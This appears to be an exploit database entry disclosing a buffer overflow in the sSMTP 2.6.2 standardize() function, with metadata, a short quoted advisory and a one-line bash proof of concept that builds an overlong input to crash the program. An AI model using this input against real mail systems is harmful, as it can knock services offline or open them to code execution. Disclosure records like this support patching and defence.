sSMTP 2.62 - 'standardize()' Buffer Overflow
Author: Brendan Boerner
type: dos
platform: linux
port:
date_added: 2010-07-26
date_updated: 2014-08-20
verified: 1
codes: CVE-2008-7258;OSVDB-67253
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/41965/info
sSMTP is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
sSMTP 2.6.2 is vulnerable; other versions may also be affected.
echo -n . ; for i in {1..2050} ; do echo -n $i ; done